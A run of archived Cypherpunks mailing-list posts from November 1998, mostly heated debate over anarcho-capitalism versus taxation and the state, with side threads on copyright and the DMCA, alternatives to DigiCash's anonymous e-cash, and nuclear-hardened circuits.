yes, agree.  In other words we need freedom for business to compete in
provision of all services currently monopolised by government.

> more and more this is becoming technically feasible. it will bring
> the potential of capitalistic competition and free markets to
> govt. how?  well services that no one uses will tend to whither, and
> the healthy ones will receive greater budgets.

But also you need multiple providers of services, otherwise your
freedom of choice is limited.

If you can opt out of literally any goverment service, I suspect
government revenues would nearly disappear.  Everything they "supply"
can be supplied more cheaply by business.  So what government remained
would have to compete on a fair basis with private industry.

> the big quandary is people who can't pay for what they use
> like social security. ultimately the question is how much
> money the state has the authority to collect for this kind of
> thing, and the political answer has varied every year, but it
> has gone up every year in the 20th century generally.

I think the state should have no authority to collect anything.
Charity at the point of a gun is not charity.  The state is an
extremely inefficient distributor of charitable funds anyway.

> the big problem imho is fraud/waste/corruption in govt though.  I
> think if a lot of it were eliminated we would be flabbergasted at
> how little a personal contribution it takes to take care of people
> who need it. bureaucracies are the most expensive thing on the
> planet. here's hoping that cyberspace will cut through the
> *ultimate* middleman: govt.

Amen to that.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Tue, 10 Nov 1998 15:36:49 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B277@yarrowbay.chaffeyhomes.com>
Message-ID: <Pine.SOL.3.96.981109230545.12771B-100000@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 9 Nov 1998, Matthew James Gering wrote:
>Yes, I assumed as much. But it is electronic circuits that are EMP/nuclear
>hardened, not the "encryption technology." We have a populace that doesn't
>understand what cryptography is, such reckless statements don't help,
>especially putting nuclear and encryption in the same sentence.

But what a fab marketing campaign, the nuclear-hardened bozz-bangle
mind-fuzzer, for those people who don't understand. But it keeps them
listening, in addition to being extremely informative for them which do.

How'd'ya make a nuclear-hardened circuit, Tim?

Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Nov 1998 08:31:38 +0800
To: guy@panix.com
Subject: Guy, anti-copyright hacker (Re: Advertising Creepiness)
In-Reply-To: <199811091519.KAA01473@panix2.panix.com>
Message-ID: <199811092326.XAA06747@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Information Security <guy@panix.com> writes:
> Declan writes:
> >   Willfully redistributing copyrighted material in violation of fair
> >   use principles is, depending on the value, also a federal
> >   crime. Redistributing a $1 article to thousands of people would be
> >   a felony. (Note I don't endorse this law, but it's useful to know
> >   what the law is.)
> 
> I guess that qualifies as a request for more color.
> 
> In the local Panix Usenet groups, I've reposted quite a few whole articles,
> often from the IP list.
> 
> Finally, a couple people made a stink, and officially complained to Panix.
> 
> [snip panix owner backing down and not interfering with Guy's posts of 
>  whole supposedly copyrighted material]

Nice one Guy!

The zen approach, it reminds me of a tactic to do with USENET cancel
forgeries used by a recentish poster to this list who you made much
a-do about being a terminator of.  You are not my any chance a
cleverly disguised nym of his?

> So, I was allowed to continue posting whole articles.
> 
> That's what the lawyers advised.
> 
> Then, the Digital Copyright Massive Federal Interference Act...
> 
> >   Fair Use vs. Intellectual Property: The U.S. Congress
> >   passed the Digital Millenium Copyright Act, a bill designed to
> >   distinguish between fair use and protected intellectual property
> >   in cyberspace.
> >   
> >        <http://thomas.loc.gov/cgi-bin/bdquery/z?d105:s.01146:>
> 
> I chose the IP list as the next-level test case...

I'm curious ... how have you faired since the millenium copyright act
with panix?  Any results?  Or is this still on-going?

Keep up the good work!

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 13:52:16 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811100532.XAA16043@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
> Date: Mon, 9 Nov 1998 21:10:33 -0800 

> > > nihilistic so much as they have come to the conclusion that 
> > > to ignore and/or subvert government has higher probability 
> > > of success than trying to reform it -- much to the demise 
> > > of the Libertarian Party.
> > 
> > There is certainly little historical evidence to support such 
> > a thesis.
> 
> My thesis that this is a common sentiment?

You can't both ignore and subvert. One is passive the other is active. Now
if your thesis holds that this is a commen sentiment then you're in big
trouble finding mass support (which is what your theory would require to be
valid). I would say the vast majority of people don't share your views.

> history, try looking around. No, I'm talking 1950's to present, and
> particularly 1990's and the internet-libertarian culture. I think this
> sentiment is historically unprecedented.

The technology is certainly unprecedented, I doubt there has been a single
new human emotion or perspective developed because of it; only new venues
for the same old human failings and foibles. Or by sentiment do you mean your
view of nihilism? If so I would suggest you study nihilism closer.

> The thesis that to ignore the nation-state will see it's demise?

Historicaly strategies reducable to a ostrich_with_its_head_in_the_sand have
not worked well in changing peoples minds nor motivating them to action, let
alone causing the demise of a nation state. This isn't surprising if you
consider the types of personalities that lead people.

> Well we
> really need a financial system that they don't control, which has been
> promised with financial cryptography but has yet to arrive. I don't think
> it's time to throw in the towel yet.

I'll disagree regarding free-market economies. As to throwing in the towel,
we agree there.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Nov 1998 08:38:29 +0800
To: Andrew.Loewenstern@wdr.com
Subject: Re: Digicash bankruptcy
In-Reply-To: <9811091614.AA00393@ch1d524iwk>
Message-ID: <199811092333.XAA06759@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Andrew Loewenstern <Andrew.Loewenstern@wdr.com> writes:
> Phill writes:
> >  The fact that Chaum didn't have the monopoly he appeared to
> >  imagine is probably why nobody was queuing up to pay his
> >  demands.
> 
> Name some other deployable payer anonymous electronic payment
> systems that are in competetion with DigiCash.

Stefan Brands patents?  Not sure if digicash would claim these
infringe the blind sig patents.

Ian Goldberg's HINDE/money changer with or without blinding -- in
general notion that you can obtain anonymity by anonymous exchange
from a trusted money changer, or with blinding from an untrusted money
changer.  As with remailers you can increase the strength of anonymity
by chaining through multiple money changers.

Or perhaps Doug Barne's proposal for a identity agnositic bank and
blinding clients distributed from jurisdictions where doesn't have
patents?  (The client is the software which does the blinding).

Pseudonymous approach to anonymity -- ecash accounts without an
TrueName indentity bound to them.

Others?  (Ryan you suggested 5 but didn't list them explicitly?)

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 14:09:29 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: fuck copyright (Re: Advertising Creepiness) (fwd)
Message-ID: <199811100539.XAA16120@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Nov 1998 22:38:21 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: fuck copyright (Re: Advertising Creepiness)

> Who cares if it's legal or not.

Lot's of people.

> I think the conclusion of crypto-anarchy is that copyright seems
> unlikely to survive as a schelling point for making money from
> publications.

Then crypto-anarchy is in for a big surprise.

> You can make money from information provision by charging extra for
> up-to-date news, or by charging so little that the cost from the
> original provider is so low that it's not worth anyones time to
> redistribute it,

That's true now, why don't we see these effects...

> or by providing higher bandwidth connection to the
> net than the mirrors,

Then why have the mirrors? There is also the issue of end-user bandwidth
limitations and network delays that make this less than decisive.

 or by making do with click throughs from the
> percentage of people who use the original rather than the cheaper
> mirror.

So, raise your rates to license the mirror.

> To say it's "not legal to republish" is saying what? that you think

It's saying it's not right  for a 3rd party to derive profit or income
from that work without a percentage being channeled back to the original
author (at least for a limited time).


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Nov 1998 09:48:13 +0800
To: petro@playboy.com
Subject: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone)(fwd)
In-Reply-To: <v04011709b26cfc756e2d@[206.189.103.230]>
Message-ID: <199811100027.AAA07402@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Christopher Petro writes:
> 	In other words Jim, Fuck You. I, and I'd bet most people here,
> including Mr. May, are perfectly willing, and hell even eager to pay their
> share, to assume their social responcibility, they just get very, very
> angry at having to pay OTHER peoples social responcibility, and get very,
> very angry at having to pay for other shit (Senate Luncheons and Swimming
> Pools, the Militaries greatly inflated budget, all the waste that is todays
> federal government).

What is annoying is "charity" (social security) at the point of a gun.
Our "conscience" is being decided by government which is acting as a
broker for those lobby for their "need" and for your assets to be
stolen and redistributed to them.

What people aren't willing to pay for shouldn't happen.  Period.  If
that means people starve well those complaining loudest had better
dig deeper into their pockets.

Anything else is socialism tending to facism, as Hayek argues in The
Road to Serfdom.

> >No state can govern those who don't wish to be governed, violence or no.
> 
> 	Yes, but a state can kill those who don't wish to be governed. Can
> and does routinely.

That's what's so interesting about cyberspace, once the payment
systems get there -- government thugs can't beat up, murder, or
incarcerate anonymous nyms.  _Then_ Jim's "No state can govern those
who don't wish to be governed" starts to become true.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Tue, 10 Nov 1998 14:30:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B276@yarrowbay.chaffeyhomes.com>
Message-ID: <3647DBE6.7B94DBEB@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



> 
> -----Original Message-----
> From: Jim Choate [mailto:ravage@einstein.ssz.com]
> Sent: Sunday, November 08, 1998 7:22 PM
> To: cypherpunks@einstein.ssz.com
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the
> Foregone (fwd)
> 
> Forwarded message:
> 
> > Date: Sun, 08 Nov 1998 21:59:18 -0500
> > From: Michael Hohensee <mah248@nyu.edu>
> > Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
> (fwd)
> 
> > Ah, but governments are just bunches of people.  The problem with
> > government (which is just an organization) is that problematic people
> > use them to cause problems for others.  That's why I'm against *having*
> > such organizations.  That's why I'm an anarcho-capitalist.
> 
> I'm still waiting for one of you guys to explain in detail how it works on a
> day to day basis...

It works much the same as it does today, except that there isn't a
parasitic state wasting resources on feeding a useless band of
politicians, or pointing guns at people who don't obey its whims.

> > It's about the same thing.  Of course, for it to do this, it must wield
> > sufficient power to exact that retribution, which, as I've been saying
> > over and over (as you've noticed) is the problem.
> 
> Well I'll tell you this. You don't have a hope in hell of getting
> anarcho-anything to work. People are not going to bust their butts simply to
> see it get yanked away by a bunch of unregulated monoploies.

Oh yeah, like they'd be much more willing to bust their butts simply to
see 50%+ of it yanked away by "regulated" (by someone else) monopolies.

You can't have malignant monopolies in an anarchy.  If any monopoly
behaved in such a manner, it would be opening itself up wide for
competition.  The only way malignant monopolies can survive is by the
use of political power (i.e. force) to keep down competitors or to force
patronage. 

And exactly how is your paragraph related to the one you quote above it?

> > But they can only enforce laws after they have been broken.  (assuming
> 
> No, they can refuse to pass laws that don't infringe the basic principles of
> the society. They can pass laws that take a conservative (not in the
> political sense but in the wary manner) approach. It takes a system that has
> sufficient check's and balances that no one group or even groups acting in
> concert can take over the sytem to their good above others. It further can
> operate on certain principles that govern the manner which the sytem
> interacts with individuals.

Ok, I'm going to tell this to you one more time, in simple words of no
more than three sylables.  I'll even put it in caps, so you can see it
easier:

LAWS DON'T GOVERN, PEOPLE DO.  

I keep pointing this out to you, and it keeps sliding in one eyeball and
out the other.  What's written on paper is *meaningless* if those in
power choose to abuse their positions.

> None of these can anarcho-anything touch upon. It assumes a priori that all
> of these social mechanisms are pointless and serve no purpose. That people
> will behave in a rational manner and that everyone is looking for equitable
> and peaceful solutions to their problems.

Anarcho-capitalists are very aware of social mechanisms.  In fact, you
may have noticed that they are what we rely upon.  What you've been
talking about, however, are *political* mechanisms.  There's a
difference.

> > that it's a "nice" state --some states'll kill you *before* you break
> > their laws).  They do not protect people, they simply punish people they
> > catch doing certain things.
> 
> So, nobody is saying there aren't governments that are worse than the US.
> What's your point (or is it just hyperbole)?

It's what you missed in the above paragraphs.  No government can prevent
something bad (i.e. the violation of individual rights) from happening. 
No government can keep you safe.  All any government can do is initiate
force after the fact, and this is *not* protection.

> > I agree, but I make no distinction between the government and the people
> > running it.
> 
> Ah, that is a fatal mistake for any political system or one who studies
> them.

And why would that be?  I don't see any of them words written on them
sheets of paper getting up and standing guard around *my* house.  I just
see the actions of the people who are allegedly enforcing them.  Their
behavior is not always correlated to what's written on their sheets of
paper.

> > The Constitution is a list of rules under which the
> > government is supposed to operate, and if it is violated, the government
> > no longer has any right to govern, and should by rights be shut down by
> > the governed.
> 
> No, those who break the law should be punished. Don't confuse the issue by
> saying simply because one man is bad and caused the system to fail that
> either all men or bad (which applies to you) 

I don't say that all men are bad.  I simply say that not all men are
good.  

Furthermore, I say that no man is good enough to rule another.  This
applies to you, me, and everyone else. 

> or all systems are broke (which
> also includes yours).

You're *almost* there.  It means that all systems of state-governance
are broke.  I propose the abolition of the state  -the lack of such a
broken system.

> A society is a group of people who act in concert under some sort of
> mechanims, the result is a nation or government. 

Wow, that's very nationalistic of you.  Nationalism wasn't always the
way people viewed the world, you know, and society existed then.

You keep saying that the state and society are somehow synonymous.  This
is simply not true  --unless you're saying that if it were not for the
existance of an organization which tells other people what to do, all
human interaction would be impossible.

> Governments have no rights,
> they're not people; another serious problem with your view. Governments have
> duties, responsibilities, and obligations. It's a job.

Heh, if you've been listening, you'd have noticed that I never said that
governments *have* rights -only that they assert that they have them.

There are no group rights, only individual rights.  Do you agree?  If
so, then how do you resolve the contradiction which develops when you
notice that members of the state apparently have the right to do things
that non-members cannot?  Specifically, the "right" to initiate force,
and the "right" to rule others? (both of which are of course non-rights,
in my view)

> > The central problem is that if the government was weak enough that it
> > *could* be shut down immediately upon its first violation of its
> > charter, it would be so weak that it could not offer a plausible
> > guarantee of retribution for Constitutionally approved crimes.
> 
> You punish people not governments. You change the laws governments act under
> when the laws are found to be bad. If the act is offensive enough you forbid
> the government from even considering the issue (as in the 1st Amendment).

*Who* punishes the punishers?  You fool, who do you think is going to
tell the highest enforcer (who supposedly wields sufficient power to
enforce anything) what to do?

> > Yup, but you cannot assume that the arbiters of the rules will always
> > have respect for the rules.
> 
> It depends on how you write the rules and the sorts of systems you create
> for review of such situations.

*sigh* I'll say it *again*.  If the rules are going to be ignored, it
doesn't _MATTER_ how they're written.

> > Rules have no power on their own --only
> > that power given to them by people who agree with them.  It is therefore
> > foolish to concentrate power to enforce rules over other people --you
> > cannot reasonably expect that the arbiters of said rules will not be
> > corrupt.
> 
> So, who said anything about people not being corrupt? Well, except you
> anarcho-whatever folks. Who keep trying to convince folks that crime and
> such will magicly disapear in your system of government.

No one ever said that.  I'm sure crime will still exist.  Robbery,
murder, etc. People go insane sometimes, some are anti-social, etc. 
What we *won't* have, however, are such state-sponsored crimes like
taxation, "regulatory" taxes designed to keep competition away from
state sponsored monopolies, and, of course, that highest of all crimes,
the initiation of force on a worldwide scale.

> > This is the standard line handed to anyone who argues for the abolition
> > of government.  As such, it's pretty easy to tear apart. :)
> >
> > First:  You tell me that without government, I'll end up watching my
> 
> No, what I'd say is that without taxes funding civil services you're going
> to watch your house burn to the slab.

Why?  Why wouldn't the services which people obviously need and want
suddenly vanish if the state didn't exist?  People are obviously going
to be willing to pay for services they want.  You think that mail, fire
protection, etc, wouldn't exist if they weren't state monopolies?  What
evidence do you have which supports this belief?  It certainly runs
counter to all available evidence (i.e. in *every other* service which
isn't monopolized by the state).

> > "house burn to the slab."  This implies that fire departments wouldn't
> > exist if they were not subsidized by the state.  This is incorrect.
> > After all, the first fire departments in the world were not publicly
> > operated.
> 
> Your right, they were a handfull of neighbors who happened to live near each
> other. That isn't the question. The question is how do you plan on handling
> the fire depts. duties in New York or Houston for example?

Read to the end of the paragraph, my dear fellow, and you will be
enlightened.  You really should be a little more patient before you
shoot off your mouth.

> > In a free market, either the homeowner or the insurance
> > companies will have an incentive to support fire departments.  I'm
> 
> Really? How do you figure that? Why do you expect that considering the level
> of abuse in the insurance industry and the competition that drives it that
> it won't get transfered into support of the fire departments without some
> sort of outside regulation? 

What's that?  Someone's running outside regulation in an anarchy?  Your
comment makes no sense in this context.

> And remember, many people don't have insurance.

They'll be able to buy it with the money they save in taxes and reduced
prices due to the lack of taxation at each step in the production of the
goods they purchase.

> What happens when the ABC sponsored fire dept. gets to a non-insurance
> house? 

Then they put out the fire, lest it spread uncontrollably to houses
which *are* covered by ABC insurance.  Then they present the homeowner
with a bill, who in turn presents the bill to his insurance company.

> Or one that's a XYZ house instead. How does the neighbor call the
> right fire station when they notice the house burning?

It is in the interest of the insurance companies (who run or finance the
fire depts.) to make it easy for people to contact a fire department. 
(it saves on claims).  

Of course, what would probably end up happening is that local fire
depts. would form, and be paid by insurance companies according to an
agreed upon rate.  A per-fire deal, if the frequency of fires is
sufficient to support this, or a flat rate (which is nicer for the
insurance companies, since they get to minimize their expenditures this
way).

> What happens when you
> have somebody on a fixed or small income. Is your position that the paultry
> sum they can raise will be taken seriously in regards compensating either
> the insurance company or the fire dept.? 

Insurance companies don't have a problem collecting lots of small fees
if they don't have to pay large ones very often.

> What about the increase in
> insurance premiums, what do you expect those to be compared to the current
> tax rates?

Significantly lower, overall, since we eliminate the middleman.

> > willing to pay the local fire department a fee to stand ready to come
> > and put out fires for me.
> 
> You do it already, it's called taxes.

Yes, but I'd rather do it *without* having a gun pointed at my head.  I
like to be able to choose which organization I want to give my money to
(rather than having the decision made for me by armed men).  

Besides, money is fungible.  For all you or I know, 100% of the money
I've paid in taxes has gone to government boondoggles.

> Yeah, reality certainly argues for civic participation and the willingness
> of neighbors to come forward wit testimony.

Perhaps the reason everyone hates each other so much these days is
because they all know, deep down, that they're being screwed over by (as
far as they can tell) everyone else.  And they are, via that amazing
organization, the state.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Tue, 10 Nov 1998 14:32:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)]
Message-ID: <3647DD8E.7FA61D66@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain

 

To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
From: Michael Hohensee <mah248@nyu.edu>
Date: Tue, 10 Nov 1998 01:30:05 -0500
References: <199811100205.UAA14919@einstein.ssz.com>

Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Mon, 9 Nov 1998 15:27:14 -0500
> > From: Petro <petro@playboy.com>
> > Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
> >  (fwd)
> 
> >       No, it's that facists & socialists like yourself think we should be
> > happy letting you decide what our social responsibilities are.
> 
> Actualy, no. I'm perfectly happy to let you run around paying no taxes on
> your income. The part you're not going to like is that I'm also not going to
> let you reap one iota of benefit from those systems that are built and
> developed by those of us who do pay taxes without a cost. And the cost will
> be more than what the necessary taxes would have been. Hell, a free-market
> capitalist shouldn't begrudge a tidy profit anyone under any situation.

Of course not --if these services were provided in a free market.  The
problem is, they're currently provided by a monopoly which is willing to
initiate force (or threaten to do so)  against any competitors.  Look at
what happened to poor old Lysander Spooner when he started competing
with the mail carriers back in the 19th century.

This much must be obvious, even to you --after all, we've been telling
you this, in different ways, *over* and *over* again.

> >       I am perfectly willing to pay for a police force. A police force
> > that arrests ALLEGED rapists, treats them like human beings until found
> > guilty and then deals with them as the law indicates. I am NOT willing to
> > pay for a police force that spends most of it's time (well, aside from
> > eating doughnuts, drinking coffee and collecting bribes) chasing after
> > teenagers with illegal chemicals. I am not willing to pay for a police
> > force that extorts money from these same teenagers. I am not willing to pay
> > money for a police force that thinks it needs to arrest people for
> > "loitering", "Mob Action", when it's defined as more than 4 people standing
> > together in a public place, and ESPECIALLY when EVERY TIME THEY ARREST
> > SOMEONE, IT'S THROWN OUT OF COURT.
> 
> Neither am I, unfortunately paying taxes or not won't resolve those sorts of
> issues. What is required is public over-watch groups (as was recently
> implimented in Austin, pisses the cops off big time) and a change in the way
> we run our prisons. As to the way people are currently treated prior to
> being found guilty at a trial is an abuse of power on the part of those
> parties involved and clearly cruel and unusual punishment for an innocent
> man.
> 
> Of course the *REAL* problem isn't the police. It's the people who make the
> laws that the police are sworn to uphold and the judges with a social agenda
> (that is not relevant to their job however much they may squeel like pigs).
> That process *is* most certainly an ideal place to inject consideration and
> respect for civil liberties and the purvue of government institutions.

You again make the argument that everything'd be fine if it weren't for
those nasty people who are abusing their offices.  Surely you remember
the flaw in that argument.  If you don't, read my last post.

> 
> >       I am willing to pay for fire protection. I am not willing to pay
> > for "universal health care", "welfare", and other such nonsense.
> 
> The Constitution happens to mention that the federal government is detailed
> with taking care of the general welfare. If you don't like that sort of stuff
> then get a Constitutional amendment passed.

Gee Jim, you're just as bad as those other statist pricks who like to
reinterpret a word's meaning after it's been changed by decades of
propaganda.

For instance, I very much doubt that "welfare" and "forced charity" were
synonymous, back in the late 18th century.

> > very angry at having to pay for other shit (Senate Luncheons and Swimming
> > Pools, the Militaries greatly inflated budget, all the waste that is todays
> > federal government).
> 
> Agreed. Throwing the Constitution away won't fix that and going to a
> free-market monopolistic no-social-responsibility-at-all system such as
> anarcho-capitalism is sure won't do it.

You still haven't given any solid arguments as to why this is the case. 
You still ignore what we've been telling you and persist in believeing
that all anarcho-capitalists are socially irresponsible at heart.  (Even
when the only apparent difference between me and you is that I'm not
willing to point a gun at another person, or have it pointed for me, to
make him perform his "social responsibility" to give me his property for
one reason or another.)

> >       Yes, but a state can kill those who don't wish to be governed. Can
> > and does routinely.
> 
> Oh what hyperbole. You make it sound like the Nazi's have invaded. They
> haven't. 

Really?  The parallels we've seen recently have been striking.

> Yes, there are misguided people out there. Yes, there are just
> plain old corrupt people out there. That won't change irrespective of the
> political system (or lack of one). 

You were correct right up until the open-parens.

> They don't just go out and pick people
> off the street and shoot them you're over-reacting and succumbing to a
> paranoid delusion of persecution.

Oh no, they haven't started doing that *yet* (as far as I know,
anyway).  They're steadily moving in that direction, however.

> Unless you kill somebody or move a few tons of coke your individual chances
> of being killed by the state is less than being struck by lightening.

What's wrong with moving a few tons of coke?  Who is harmed by coke who
does not wish to be?

> >       But did you bother to read them this time?
> 
> Actualy I read it twice before I even decide if I'm going to reply.
> 

That would explain your responses.  You read them so fast that all you
see are little hooks for you to tack on your pre-recorded statist rants
to, while your mind skims smoothly over those arguments which don't
conform to your preconcieved notions.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Tue, 10 Nov 1998 14:36:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
In-Reply-To: <199811100252.UAA15446@einstein.ssz.com>
Message-ID: <3647DDEA.2D9B5604@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> So what are saying...that because any government ever happened to abuse its
> citizens in a particular way is justification to do away with all
> government?

No, it's because *all* governments abuse their citizens.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous lo14 <nobody@lo14.wroc.pl>
Date: Tue, 10 Nov 1998 10:42:01 +0800
To: cypherpunks@cyberpass.net
Subject: govt server architecture
Message-ID: <6c32470712900957c71c30cf0bd3cfe1@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Greetings and salutations,

Can anyone share experience with U.S. government server hardware,
used for medium-load computing applications (not supercomputers)?

I'm looking for information on brand names, flops, etc. and where to
find more.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 21:59:44 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811101323.HAA17131@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 09:08:11 -0500
> From: Soren <sorens@workmail.com>
> Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)

> <P>This also provides an outlet for the social do-gooders to create their
> utopias by vastly inflating those taxes associated with less favored consumables

Hm, interesting choice of terms for comparison. So you're admitting that
anarcho-whatever isn't a social do-gooder, the intent is not to make the
system better or more equitable. Rather you're admitting, apparently
tacitly, that the goal of the anarcho-whatever is personal rather than
social improvement. There is also a further tacit admission with this
system won't address the social ills that plague us currently.

I must admit I'm impressed. In a couple of days I've run across two seperate
anarcho-whatever supporters who admit their proposal won't address the
social ills but rather leaves them up to chance. That's more than in the
last 20 years.

> be heavily taxed, and what not.&nbsp; Perhaps this is why there were multiple
> states in the US rather than a single homogenous state, prior to Honest
> (I am not a crook) Abe?

Duh, I believe the boy has it.

> <P>Last time I looked at it, there were 108 separate taxes included in
> the retail cost of an egg and 112 for a loaf of bread, so yes, I would

I'd like a reference to this particular list if possible.

> <P>One question for the socialists out there;&nbsp; when is the promised
> egalitarian utopia&nbsp; going to kick in?&nbsp; It doesn't seem to be
> getting any closer.</HTML>

I'd ask the same question of the anarcho-whatever but you took care of it so
adroitely above...


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 21:54:28 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811101327.HAA17191@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 11:18:44 +0100
> From: "Albert P. Franco, II" <apf2@apf2.com>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the
>   Foregone(fwd)

> Try to lift yourself out of the bullshit of your theory and give us at
> least one REAL example (current or historic) of a large scale, long lasting
> anarcho-capitalist society. Hippie communes are too small, and make sure
> it's capitalistic. If you can't think of one in the next year or so then
> come back and tell us.

And I've something to add. Any person who mentions Iceland as a workable
anarchy is in deep trouble. I done the research and it doesn't fly as a
workable example *unless* you're willing to legalize murder which is
*EXACTLY* what the Icelanders did. It didn't work for them long-term and it
won't work for us either. So if you want to use it you've got to explain why
legalizing murder is a social positive.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 21:58:55 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811101331.HAA17287@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 01:32:10 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)

> Jim Choate wrote:
> > 
> > So what are saying...that because any government ever happened to abuse its
> > citizens in a particular way is justification to do away with all
> > government?
> 
> No, it's because *all* governments abuse their citizens.

People abuse people, it's why anarcho-anything won't work. Quit confusing
human nature with political systems. Democracy recognizes that individuals
are abused, and that they are wont to accept that abuse until it becomes
truly excessive (which our country isn't by a long shot). It's the reason
the individual is given a vote and civil liberties.

If you seriously think you're going to pass a set of laws ( or by extension
throw the ones we have out) and the world will be a better place then you
are one confused puppy.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




